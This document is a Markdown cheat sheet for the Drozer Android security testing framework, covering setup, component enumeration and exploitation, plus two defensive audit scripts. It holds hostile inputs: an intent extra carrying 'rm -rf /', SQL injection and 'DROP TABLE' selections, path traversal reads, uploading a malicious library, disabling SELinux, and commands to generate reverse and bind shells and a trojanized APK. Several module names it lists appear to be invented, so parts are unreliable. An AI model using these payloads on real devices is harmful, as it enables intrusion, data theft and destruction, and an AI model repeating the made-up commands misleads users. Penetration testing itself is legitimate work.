# Drozer Cheat Sheet

## Overview

Drozer is a comprehensive security testing framework for Android applications. It lets you take on the role of an Android app and interact with the Dalvik virtual machine, other applications' IPC endpoints and the underlying operating system. Drozer provides tools for remote exploitation of Android devices through malicious applications and for a complete security assessment of Android apps.

⚠️ Warning: Use Drozer only on devices and applications you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.
## Installation

### Prerequisites

```bash
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK tools (adb and fastboot)
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
```
### Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
```

### macOS Installation

```bash
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
```
### Windows Installation

```bash
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
```
### Android Device Setup

```bash
# Enable USB debugging on the Android device
# Settings > Developer Options > USB Debugging

# Install the Drozer agent on the device
adb install drozer-agent-2.4.4.apk

# Start the Drozer agent on the device
# Open the Drozer Agent app and toggle "Embedded Server" ON

# Forward the agent port for communication
adb forward tcp:31415 tcp:31415
```
## Basic Usage

### Connecting to the Device

```bash
# Connect to the Drozer agent (defaults to localhost:31415)
drozer console connect

# Connect to a specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to a specific device
drozer console connect --device <device_id>
```
### Basic Commands

Module names differ between Drozer releases and forks, so confirm that a module exists with `dz> list` (or `dz> help <module>`) before relying on it in a script.

```bash
# List available modules
dz> list

# Get help for a specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
```
## Package Analysis

### Package Information

```bash
# List all packages
dz> run app.package.list

# List packages matching a filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions
dz> run app.package.info -a com.example.app -p

# Find packages with a specific permission
dz> run app.package.list -p android.permission.INTERNET

# List system packages
dz> run app.package.list -f system

# List third-party packages
dz> run app.package.list -3
```
### Application Components

```bash
# List activities
dz> run app.activity.info -a com.example.app

# List exported activities
dz> run app.activity.info -a com.example.app -e

# List services
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e
```
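The `-e` listings above report the attack surface a reviewer can also check offline in the app's manifest. The script below is an added example, not part of this cheat sheet or of Drozer: it audits a constructed `AndroidManifest.xml` and flags every component another app can reach, noting whether a permission guards it (the package and component names are made up).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_KINDS = ("activity", "service", "receiver", "provider")

# Constructed manifest for the demo; package and component names are made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <!-- exported with no permission: any app on the device can start it -->
    <activity android:name=".AdminActivity" android:exported="true"/>
    <!-- exported, but callers must hold the app's own permission -->
    <provider android:name=".DataProvider"
        android:authorities="com.example.provider"
        android:exported="true"
        android:permission="com.example.app.permission.DATA"/>
    <!-- not exported: only this app can start or bind it -->
    <service android:name=".BackgroundService" android:exported="false"/>
    <!-- no android:exported but an intent filter: implicitly exported on
         API < 31; apps targeting 31+ must set android:exported explicitly -->
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def android_attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def audit_manifest(manifest_xml):
    """Return (name, kind, reason) for each component reachable from other apps,
    the same set that 'app.<kind>.info -a <package> -e' reports on the device."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    for kind in COMPONENT_KINDS:
        for comp in app.findall(kind):
            exported = android_attr(comp, "exported")
            if exported == "true":
                reason = "exported=true"
            elif exported is None and comp.find("intent-filter") is not None:
                reason = "implicitly exported (intent-filter, no android:exported)"
            else:
                continue  # exported="false", or no filter and no explicit export
            permission = android_attr(comp, "permission")
            if permission:
                reason += ", guarded by %s" % permission
            else:
                reason += ", no permission required"
            findings.append((android_attr(comp, "name"), kind, reason))
    return findings

if __name__ == "__main__":
    for name, kind, reason in audit_manifest(SAMPLE_MANIFEST):
        print("%-18s %-8s %s" % (name, kind, reason))
```

Providers can additionally scope access with `android:readPermission` and `android:writePermission`; extend `android_attr` lookups to those if your review needs them.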
## Activity Testing

### Activity Enumeration

```bash
# Find activities in a package
dz> run app.activity.info -a com.example.app

# Find exported activities
dz> run app.activity.info -a com.example.app -e

# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i

# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
```
### Activity Exploitation

```bash
# Start an activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start an activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start an activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start an activity with a specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
```
## Service Testing

### Service Enumeration

```bash
# List services in a package
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
```
### Service Exploitation

```bash
# Start a service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start a service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send an intent to a service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
```
## Content Provider Testing

### Content Provider Enumeration

```bash
# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

# Find URIs for a content provider
dz> run app.provider.finduri com.example.provider

# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
```
### Content Provider Exploitation

```bash
# Query a content provider
dz> run app.provider.query content://com.example.provider/users

# Query with a selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into a content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in a content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from a content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via a content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
```
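The `app.provider.read .../files/../../etc/hosts` request above (and `scanner.provider.traversal` later in this sheet) works when a provider's `openFile()` joins the URI path onto a directory without checking where the result lands. The following added example, not from the cheat sheet or from Drozer, models that vulnerable resolution next to the canonicalize-and-check fix in Python; the export directory and files are constructed in a temporary directory for the demo.

```python
import os
import tempfile


class TraversalRejected(Exception):
    """Raised when a URI path would escape the provider's export directory."""


def resolve_vulnerable(export_dir, uri_path):
    """Mirrors new File(exportDir, uriPath) with no containment check:
    '../' segments walk straight out of the export directory."""
    return os.path.join(export_dir, uri_path)


def resolve_hardened(export_dir, uri_path):
    """Mirrors File.getCanonicalPath() plus a startsWith(exportDir + "/") check.
    Canonicalizing first is what makes the prefix test trustworthy."""
    base = os.path.realpath(export_dir)
    candidate = os.path.realpath(os.path.join(base, uri_path))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise TraversalRejected(uri_path)
    return candidate


def demo():
    """Build a constructed layout in a temp dir and report, per request, whether
    the vulnerable resolver reaches a file and whether the hardened one allows it."""
    root = tempfile.mkdtemp()
    export_dir = os.path.join(root, "files")
    os.makedirs(export_dir)
    with open(os.path.join(export_dir, "secret.txt"), "w") as f:
        f.write("exported on purpose\n")
    with open(os.path.join(root, "outside.txt"), "w") as f:
        f.write("must stay private\n")

    results = {}
    for req in ("secret.txt", "../outside.txt", "sub/../secret.txt"):
        vulnerable_target = resolve_vulnerable(export_dir, req)
        try:
            resolve_hardened(export_dir, req)
            allowed = True
        except TraversalRejected:
            allowed = False
        results[req] = {
            "vulnerable_reads": os.path.isfile(vulnerable_target),
            "hardened_allows": allowed,
        }
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print("%-20s vulnerable reads: %-5s hardened allows: %s"
              % (req, outcome["vulnerable_reads"], outcome["hardened_allows"]))
```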
## Broadcast Receiver Testing

### Broadcast Receiver Enumeration

```bash
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# Find receivers for a specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
```
### Broadcast Receiver Exploitation

```bash
# Send a broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send a broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Send an ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
```
## File System Analysis

### File System Enumeration

```bash
# List application files
dz> run tools.file.list /data/data/com.example.app/

# Find readable files
dz> run tools.file.readable /data/data/com.example.app/

# Find writable files
dz> run tools.file.writable /data/data/com.example.app/

# Search for files matching a pattern
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
```
### File System Exploitation

```bash
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

# Download a file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# Upload a file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

# Create a symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```
## Database Analysis

### SQLite Database Testing

```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Connect to a SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

# List tables in the database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

# Query the database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

# Dump the database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

# Export the database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```
## Network Analysis

### Network Configuration

```bash
# Check the network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

# List network interfaces
dz> run tools.setup.network

# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```
### SSL/TLS Testing

```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app

# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app

# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```
## Advanced Exploitation

### Custom Module Development

```python
# Create a custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module


class CustomExploit(Module, common.FileSystem, common.PackageManager):
    name = "Custom Exploit Module"
    description = "Custom exploitation module"
    examples = "run custom.exploit -a com.example.app"
    author = "Security Researcher"
    date = "2024-01-01"
    license = "BSD (3 clause)"
    path = ["custom"]

    def add_arguments(self, parser):
        parser.add_argument("-a", "--package", help="target package")

    def execute(self, arguments):
        if arguments.package:
            self.stdout.write("Exploiting package: %s\n" % arguments.package)
            # Custom exploitation logic here
        else:
            self.stdout.write("Please specify target package\n")
```
### Payload Generation

```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk

# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

# Generate bind shell payload
dz> run payload.bind.shell --port 4444

# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```
### Privilege Escalation

```bash
# Check for root access
dz> run tools.setup.busybox

# Exploit setuid binaries
dz> run exploit.setuid.find

# Test for kernel exploits
dz> run exploit.kernel.check

# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app

# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```
## Automation Scripts

### Comprehensive Assessment Script

```python
#!/usr/bin/env python3
import json
import subprocess
import sys


class DrozerAutomation:
    def __init__(self, package_name):
        self.package = package_name
        self.results = {}

    def run_drozer_command(self, command):
        """Run one console command via 'drozer console connect -c' and return its output."""
        try:
            cmd = ["drozer", "console", "connect", "-c", command]
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return output.decode('utf-8')
        except subprocess.CalledProcessError as e:
            return f"Error: {e.output.decode('utf-8')}"

    def analyze_package(self):
        """Perform comprehensive package analysis"""
        print(f"[+] Analyzing package: {self.package}")
        # Package information
        self.results['package_info'] = self.run_drozer_command(
            f"run app.package.info -a {self.package}"
        )
        # Activities
        self.results['activities'] = self.run_drozer_command(
            f"run app.activity.info -a {self.package}"
        )
        # Services
        self.results['services'] = self.run_drozer_command(
            f"run app.service.info -a {self.package}"
        )
        # Content providers
        self.results['providers'] = self.run_drozer_command(
            f"run app.provider.info -a {self.package}"
        )
        # Broadcast receivers
        self.results['receivers'] = self.run_drozer_command(
            f"run app.broadcast.info -a {self.package}"
        )
        return self.results

    def test_exported_components(self):
        """Enumerate exported components for follow-up testing"""
        print("[+] Testing exported components")
        # Exported activities
        exported_activities = self.run_drozer_command(
            f"run app.activity.info -a {self.package} -e"
        )
        # Exported services
        exported_services = self.run_drozer_command(
            f"run app.service.info -a {self.package} -e"
        )
        # Exported providers
        exported_providers = self.run_drozer_command(
            f"run app.provider.info -a {self.package} -e"
        )
        return {
            'exported_activities': exported_activities,
            'exported_services': exported_services,
            'exported_providers': exported_providers
        }

    def test_content_providers(self):
        """Test content providers for vulnerabilities"""
        print("[+] Testing content providers")
        # Find URIs
        uris = self.run_drozer_command(
            f"run app.provider.finduri {self.package}"
        )
        # Scan for accessible URIs
        accessible_uris = self.run_drozer_command(
            f"run scanner.provider.finduris -a {self.package}"
        )
        return {
            'uris': uris,
            'accessible_uris': accessible_uris
        }

    def generate_report(self):
        """Generate comprehensive security report"""
        report = {
            'package': self.package,
            'analysis_results': self.results,
            'exported_components': self.test_exported_components(),
            'content_provider_tests': self.test_content_providers()
        }
        report_file = f"{self.package}_security_report.json"
        with open(report_file, 'w') as f:
            json.dump(report, f, indent=2)
        print(f"[+] Report saved: {report_file}")
        return report


# Usage
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 drozer_automation.py <package_name>")
        sys.exit(1)
    package_name = sys.argv[1]
    analyzer = DrozerAutomation(package_name)
    analyzer.analyze_package()
    analyzer.generate_report()
```
### Batch Testing Script

```bash
#!/bin/bash
# Batch testing script for multiple packages

PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"

mkdir -p "$RESULTS_DIR"

while IFS= read -r package; do
    echo "[+] Testing package: $package"

    # Create package-specific directory
    mkdir -p "$RESULTS_DIR/$package"

    # Run comprehensive tests
    drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
    drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
    drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
    drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
    drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

    # Test content providers
    drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

    # Test for common vulnerabilities
    drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
    drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

    echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"

echo "[+] Batch testing completed"
```
## Troubleshooting

```bash
# Launch the Drozer agent activity (starts it if it is not already running)
adb shell am start -n com.mwr.dz/.activities.MainActivity

# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415

# Restart the ADB server
adb kill-server
adb start-server

# Check device connectivity
adb devices

# Test the connection manually
telnet localhost 31415
```

```bash
# Reinstall the Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk

# Check agent permissions
adb shell dumpsys package com.mwr.dz

# Enable the agent in device settings
# Settings > Apps > Drozer Agent > Permissions

# Check if the agent process is running
adb shell ps | grep drozer
```

```bash
# Refresh the module list
dz> reload

# Check the module path
dz> list

# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/

# Debug module loading
dz> help custom.module
```

```bash
# Check required permissions
adb shell dumpsys package com.example.app | grep permission

# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

# Check SELinux status
adb shell getenforce

# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```

```bash
# Increase timeout values
dz> set timeout 30

# Reduce output verbosity
dz> set verbose false

# Clear the cache
rm -rf ~/.drozer/cache/

# Use a specific device
drozer console connect --device <device_id>
```